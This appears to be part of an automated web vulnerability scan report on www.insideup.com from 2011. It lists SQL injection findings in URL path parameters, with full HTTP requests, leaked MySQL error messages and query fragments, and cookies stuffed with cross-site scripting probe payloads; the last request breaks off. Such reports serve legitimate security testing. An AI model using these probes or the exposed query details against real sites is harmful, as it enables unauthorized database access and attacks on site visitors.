<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.386. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:37:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=8c2n31rovalbpva9jou5244ui2; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow'/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow'/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow'/hins0' at line 5

Request 2

GET /ppc/leadflow''/hins00/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:37:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7f3v0n3b9bm3si1rklpnn3d4b3; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/hins00/project_dynamic_page_updated.php was not found on this server.</p>

1.387. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00'/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:37:27 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j8s9pgtlhnagvuhs7o2atg4i73; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/hins00'/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00'/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&group=hins00&template=3' OR prj.project_page_url = 'leadflow/hins00' at line 5

Request 2

GET /ppc/leadflow/hins00''/project_dynamic_page_updated.php?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:37:28 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7igufuoddkom0s6om2m4tlng85; path=/
Content-Length: 129
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/hins00''/project_dynamic_page_updated.php was not found on this server.</p>

1.388. http://www.insideup.com/ppc/leadflow/hins00/project_dynamic_page_updated.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project_dynamic_page_updated.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project_dynamic_page_updated.php'?catId=50002&group=hins00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
